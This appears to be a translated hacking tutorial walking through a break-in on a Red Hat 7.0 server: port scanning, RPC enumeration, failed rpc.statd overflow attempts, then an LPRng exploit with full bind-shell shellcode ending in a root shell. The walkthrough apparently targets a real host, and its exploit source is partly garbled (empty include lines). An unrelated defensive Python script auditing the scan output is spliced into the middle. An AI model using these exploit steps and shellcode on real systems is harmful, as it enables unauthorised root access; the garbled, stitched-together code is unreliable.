Strengthening Security: Seeing How Attackers Break Into Linux

• Time:
• Views: 8
• Source: 124软件资讯网

The purpose of this article is not to teach intrusion, but to improve one's own skills and to raise network administrators' security awareness. Nothing more! Careless network administrators should understand this: a single small operational mistake on your part can cause the entire network to fall. This article is built around an attack on LPD, the network printing service.

First, settle on a target; assume it is www.XXX.com

Let me first see whether it can be reached at all:

Quoted fragment:
 C:\>ping www.XXX.com
                Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:
                Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
                Ping statistics for 202.106.184.200:
                Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
                Approximate round trip times in milli-seconds:
                Minimum = 511ms, Maximum = 651ms, Average = 580ms
Hehe, not only is it reachable, the speed is pretty good too......
First telnet in to look at the banner:
C:\>telnet www.XXX.com


Connection to host lost.
Now try ftp:

Quoted fragment:
C:\>ftp www.XXX.com
                Connected to www.fbi.gov.tw.
                220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
                User (www.XXX.com:(none)):


wu-2.6.1: now there is something to go on. This machine looks like Red Hat 7.0! That needs confirming first, so connect to my jump host:
Quoted fragment:
 C:\>telnet xxx.xxx.xxx.xxx
                Red Hat Linux release 7.0 (Guinness)
                Kernel 2.2.16-22smp on an i686
                login: fetdog
                Password:
                bash-2.04$


Bring out the nmap scanner and see what is hiding in there~~~


Quoted fragment:
 bash-2.04$nmap -sT -O www.XXX.com
                Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
                WARNING! The following files exist and are readable: /usr/local/sha
                -services and ./nmap-services. I am choosing /usr/local/share/nmap/
                s for security reasons. set NMAPDIR=. to give priority to files in
                irectory
                Interesting ports on (www.XXX.com):
                (The 1520 ports scanned but not shown below are in state: closed)
                Port State Service
                25/tcp open smtp
                79/tcp open finger
                80/tcp open http
                111/tcp open sunrpc
                113/tcp open auth
                443/tcp open https
                513/tcp open login
                514/tcp open shell
                515/tcp open printer
                587/tcp open submission
                1024/tcp open kdm
                TCP Sequence Prediction: Class=random positive increments
                Difficulty=3247917 (Good luck!)
                Remote operating system guess: Linux 2.1.122 - 2.2.16
                Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds


Quite a few open ports, which means more possible ways in. 79/tcp open finger: look at this one first, although Linux does not have the finger user-list vulnerability.

Quoted fragment:
 bash-2.04$finger @www.XXX.com
                [www.XXX.com]
                No one logged on.


Now look at 111/tcp open sunrpc. RPC vulnerabilities have been popular lately; does this RH7 box have one? Take a look first and see!
Quoted fragment:
 bash-2.04$rpcinfo -p www.XXX.com
                program vers proto port service
                100000 2 tcp 111 rpcbind
                100000 2 udp 111 rpcbind
                100021 1 udp 1024 nlockmgr
                100021 3 udp 1024 nlockmgr
                100024 1 udp 1025 status
                100024 1 tcp 1024 status
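From the administrator's side, the same nmap port table and rpcinfo listing are an exposure inventory: every legacy service the scan shows open is one the admin can shut off or firewall before anyone gets to the exploit stage. The following Python script is an added example, not code from the original article: it parses the two listings quoted above (re-typed here as constructed sample input) and reports which exposed services should be disabled or restricted. The service and RPC-program risk tables, severities and recommendations are the example's own assumptions, not something the article states.

```python
import re
from dataclasses import dataclass

# Constructed sample: the nmap port table and rpcinfo listing quoted in the
# article, re-typed as test input (not captured from a live host).
NMAP_SAMPLE = """\
Port State Service
25/tcp open smtp
79/tcp open finger
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
443/tcp open https
513/tcp open login
514/tcp open shell
515/tcp open printer
587/tcp open submission
1024/tcp open kdm
"""

RPCINFO_SAMPLE = """\
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status
"""

# Assumed policy table (the example's own, not the article's): services that
# should not be reachable from untrusted networks, with what an admin would do.
LEGACY_TCP_SERVICES = {
    "finger": ("medium", "disable in.fingerd; it only leaks account names"),
    "sunrpc": ("high", "block 111/tcp+udp at the perimeter; stop portmap if NFS is unused"),
    "login": ("high", "disable in.rlogind (rlogin); use ssh instead"),
    "shell": ("high", "disable in.rshd (rsh); use ssh instead"),
    "printer": ("high", "restrict 515/tcp (lpd/LPRng) to the LAN or replace it with CUPS over TLS"),
}

# Assumed table of RPC program numbers whose exposure is itself a finding.
LEGACY_RPC_PROGRAMS = {
    100024: ("high", "stop rpc.statd unless NFS locking is required; firewall its port"),
    100021: ("medium", "nlockmgr is only needed for NFS; restrict it to NFS clients"),
}


@dataclass(frozen=True)
class Finding:
    source: str          # which tool's output the finding came from
    port: int
    proto: str
    name: str
    severity: str
    recommendation: str


NMAP_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
RPC_LINE = re.compile(r"^(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)")


def audit_nmap(text):
    """Flag open ports whose service name is in the legacy table."""
    findings = []
    for line in text.splitlines():
        m = NMAP_LINE.match(line.strip())
        if not m:
            continue  # header or non-port line
        port, proto, svc = int(m.group(1)), m.group(2), m.group(3)
        if svc in LEGACY_TCP_SERVICES:
            sev, rec = LEGACY_TCP_SERVICES[svc]
            findings.append(Finding("nmap", port, proto, svc, sev, rec))
    return findings


def audit_rpcinfo(text):
    """Flag registered RPC programs from the legacy table, once per (program, proto, port)."""
    findings, seen = [], set()
    for line in text.splitlines():
        m = RPC_LINE.match(line.strip())
        if not m:
            continue
        prog, proto, port, name = int(m.group(1)), m.group(3), int(m.group(4)), m.group(5)
        key = (prog, proto, port)  # several versions of one program share a port; report once
        if prog in LEGACY_RPC_PROGRAMS and key not in seen:
            seen.add(key)
            sev, rec = LEGACY_RPC_PROGRAMS[prog]
            findings.append(Finding("rpcinfo", port, proto, name, sev, rec))
    return findings


def audit(nmap_text, rpcinfo_text):
    """Combined report, highest severity first, then by port, so output is stable."""
    order = {"high": 0, "medium": 1}
    findings = audit_nmap(nmap_text) + audit_rpcinfo(rpcinfo_text)
    return sorted(findings, key=lambda f: (order[f.severity], f.port, f.proto))


if __name__ == "__main__":
    for f in audit(NMAP_SAMPLE, RPCINFO_SAMPLE):
        print(f"[{f.severity:6}] {f.source:8} {f.port}/{f.proto} {f.name}: {f.recommendation}")
```

Run against the article's own listings, the report names eight exposures, six of them high: the portmapper, rlogin, rsh, the printer port that the rest of the article attacks, and rpc.statd on both udp/1025 and tcp/1024. Feeding it the output of a scan of one's own hosts turns the attacker's reconnaissance step into a routine hardening checklist.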


So the rpc.statd service is there. Let's see whether a remote overflow will hand over a root shell.
Quoted fragment:
 bash-2.04$./statdx -h
                statdx by ron1n
                Usage: stat [-t] [-p port] [-a addr] [-l len]
                [-o offset] [-w num] [-s secs] [-d type]
                -t attack a tcp dispatcher [udp]
                -p rpc.statd serves requests on [query]
                -a the stack address of the buffer is
                -l the length of the buffer is [1024]
                -o the offset to return to is [600]
                -w the number of dwords to wipe is [9]
                -s set timeout in seconds to [5]
                -d use a hardcoded
                Available types:
                0 Redhat 6.2 (nfs-utils-0.1.6-2)
                1 Redhat 6.1 (knfsd-1.4.7-7)
                2 Redhat 6.0 (knfsd-1.2.2-4)
Looks like RH7 isn't supported. Try anyway; run through all of 0-2 first and see! start......
                bash-2.04$stat -d 0 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21
Thwarted; try again......
                bash-2.04$stat -d 1 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21



Same result; continue

Quoted fragment:
 bash-2.04$stat -d 1 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21


rpc.statd is a dead end. Thinking about it, RH7 should have a remote overflow, apparently caused by the lp service. "seclpd.c" should be the one.
—————The following code is for teaching use only and must never be used to carry out malicious attacks—————

Quoted fragment:
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #define ADDRESS_BUFFER_SIZE 32+4
                #define APPEND_BUFFER_SIZE 52
                #define FORMAT_LENGTH 512-8
                #define NOPCOUNT 200
                #define SHELLCODE_COUNT 1030
                #define DELAY 50000
                #define OFFSET_LIMIT 5000
                char shellcode[] =
                "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
                "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
                "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
                "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
                "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
                "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
                "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
                "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
                "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


brute: brute-force it. After waiting roughly 5-8 minutes, the result comes out.

Quoted fragment:
 - [+] shell located on www.XXX.com
                - [+] Enter Commands at will
                Linux XXX.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
                uid=0(root) gid=7(lp)


uid=0 (root privileges), so the intrusion could now go further! But don't do anything bad!